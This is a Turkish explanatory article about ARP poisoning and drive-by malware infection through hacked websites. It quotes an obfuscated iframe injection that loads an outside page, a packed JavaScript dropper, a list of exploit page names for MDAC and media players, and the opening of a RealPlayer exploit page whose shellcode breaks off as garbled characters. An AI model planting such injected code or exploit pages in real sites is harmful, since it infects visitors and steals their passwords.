ARP Saldiri Sistemi Nedir


ARP SALDIRI SİSTEMİ NEDİR/NE İŞE YARAR Geçmişten günümüze virüslerin yayılımında gözle görülür şekilde değişiklik meydana gelmiştir. Virüslerin yayılım hızı geçmişte BBS’lerin ve Disketlerin({bilgilerin 3,5 inç ve 5,25 inçlik birimlere sığdırıldığı zamanlarda}) kullanım oranı belirlerdi.  Halen 3,5 inçlik disketlerin kullanılmasına rağmen bu birimlerden yayılan virüslerin oranı yok denecek kadar azdır. Artık virüs gibi zararlı yazılımların kullanıcıları etkilemesi için disketlerin bilgisayar kullanıcıları arasında elden ele dolaşmasına gerek kalmadı. Bir virüsün yayılması için başlayan kıtalar arası seyahat geçmişte uzun sürmekte idi. Artık günümüzde bu tür zararlı yazılımların(virüs, trojan, solucan …) yayılma süreci, kıtaların uzaklığına bağlı olmaksızın Internet aracılığıyla kısa sürede gerçekleşmektedir.

“Belirli bir yapı içerisinde birbirine bağlı bilgisayarların birbirini etkileme olasılığı nedir?” sorusu, Virüs, Trojan, Solucan gibi bir aktiviteye yerel ağda(LAN) rastlanıldığında akla gelir. Geçmişten günümüze zararlı uygulamaların gelişim sürecine bakıldığında şu anki varılan noktanın yerel sistemler üzerine yoğunlaştığı görülür. Aynı hiyerarşi üzerinde ne kadar çok bilgisayara ulaşırsam istediğime o kadar çok yakınlaşırım felsefesi benimsemiştir, Virüs/Solucan/Trojan gibi zararlı program(cık) yazarları.
Bir süre önce Metasploit sitesine girenler “hacked by sunwerar! Just for fun” ibaresiyle karşılaştıklarını belirtmişlerdi(Ref .4). Sitede bu ibarenin yer almasının baş nedeni olarak ARP poisoning(ARP Tablo Zehirleme) gösterildi. En yakın bu örnek incelendiğinde aslında bu olay durumun ne kadar vahim bir tehlike arz edeceğini gösterir. ARP Tablo Zehirleme son zamanlarda Trojan vakalarında da kullanılmaktadır. Ortaya çıkan bu tehlikeli durumlar tek bir bilgisayar kullanıcısını etkilemektense yukarıda belirttiğim hedef gibi birden çok kullanıcıdır.

Derinlemesine bir atak tipi ARP Tablo Zehirleme tekniğinin zararlı programların yayılımında kullanılmasının ardında aslında temel bir düşünce vardır. Tek bir hedef üzerinden bir çok konuma dokunuş. Bir çok kullanıcının hedef olmasında ve bu hedeflere ulaşmada arama motorlarından da faydalanılmaktadır. Saldırgan öncelikle arama motorları vasıtasıyla (örn:google,yahoo,altavista) zaaflık içeren sitelere müdahale ederek (Örn: SQL Injectioni) sitelerin sayfalarında değişiklik yapar(Resim 1). Zayıflıktan yararlanılarak değiştirilen bu web sayfalarına bir kod ekler. Bu kod vasıtasıyla siteyi ziyaret edenlerin bilgisayarına zararlı uygulamalar yükler. Bu zararlı uygulamaların kullanıcıların haberi olmadan yüklenmesi için bazı basamakların gerçekleşmesi gerekmektedir. Neticesinde zararlı program kullanıcın sistemine yüklendikten sonra kullanıcı artık zararlı programın işleyişine göre takip edilebilir.


Resim 1

Bu yayılım konusuna ilişkin “Gizli Tehlike” başlıklı yazımda anlatılmıştı(Ref. 1).

Bir yerel ağa bağlı kullanıcı bir web sitesine bağlandığında eğer site tehlikeli bir kod içeriyorsa kullanıcı farkında olmadan başka bir tehlikeli web adresine yönlendirilir. Bu esnada kullanıcının bilgisayarına şifre çalıcı(Örn: infostealer türü) gibi zararlı yazılımların yüklenmesi için bazı basamaklar gerçekleştirilir. Zararlı yazılımın kullanıcı üzerinde etkili olabilmesi için öncelikle sistemine yüklenmesi gerekir. Web üzerinden yazılımın bulaşma süreci, kullanıcının sisteminde bir zaafiyet mevcut ise başlar.
Bir şifre çalıcının sisteme yüklenme aşamasını örnekleyelim.
Kullanıcı, güvenerek bağlandığı
www.web_sitesi.net adresinde bir yönlendirme var ise
{Örn: window["x64x6fx63x75x6dx65x6ex74"].write('<iframe width=100 height=0 src=http://site.cn/news.html></iframe>');}
veya site içerisine bir javascript kod eklenmiş ise
{Örn: eval(function(p,a,c,k,e,d). |Real|Tool|cab|x36|exe|x34|x53..'.split('|'),0,{}))</script>}
bu tür işlemlerin temel işlevi sisteme bir dosya aktarmaktır. Kullanıcı siteye bağlandıktan sonra sisteminde bir açıklık tespit etme yoluna gidilir. Eğer sistemde Realplayer, Internet Explorer gibi yazılımlara ait bir sorun tespit edildiğinde kullanıcıya tehlikeli yazılım aktarılır.
Bir çok web sitesi sahipleri sitelerinde iframe ve function(p,a,c,k,e,d) gibi kısımların web sayfalarına eklendiği konusunda uyarılarda bulunduğunu bir çok yerde gördüm. Bu internet sitelerine bağlananlara zararlı yazılım yükleme yoluna giden kişilerin başvurduğu bir yöntemdir. Amaç zararlı yazılımların olabildiğince çok kullanıcıya yüklenmesidir. Web sitesine eklenen bu tür kodlar tek parçadan oluşmaz.
Bu işlemi otomatik olarak yapan yazılımlar Uzakdoğu sitelerinde yer almaktadır. Bu tür yazılımlar sayesinde otomatik olarak kullanıcı zor durumda bırakacak .html türü sayfalar oluşturulup çeşitli sunuculara bu tehlikeli sayfalar aktarılır.
http://web_sitesi.com/Ajax.htm - MDAC Exploit
http://web_sitesi.com/Ms06014.htm - MDAC Exploit
http://web_sitesi.com/Real.gif - RealPlayer Exploit
http://web_sitesi.com/Bfyy.htm - Storm Player Exploit
http://web_sitesi.com/Lz.htm - Ourgame GLWorld Exploit
http://web_sitesi.com/Pps.htm - PowerPlayer Control Exploit
http://web_sitesi.com/XunLei.htm - XunLei Thunder PPlayer Exploit

Yukarıda belirtilen örnek sayfalardan göreceğimiz üzere Realplayer uygulamasındaki bir açıklık kullanıcının sisteminde denecek ve olumlu sonuç elde edildiğinde sisteme bir .exe dosyası yüklenecektir.
Örnek İşlem:
---------------------------------------------

<html>
 <head>
  <title>Real Player  Exploit !</title>
  <script language="JavaScript" defer>
    function Check() {

var shellcode = unescape("䍃䍃䍃ꏩ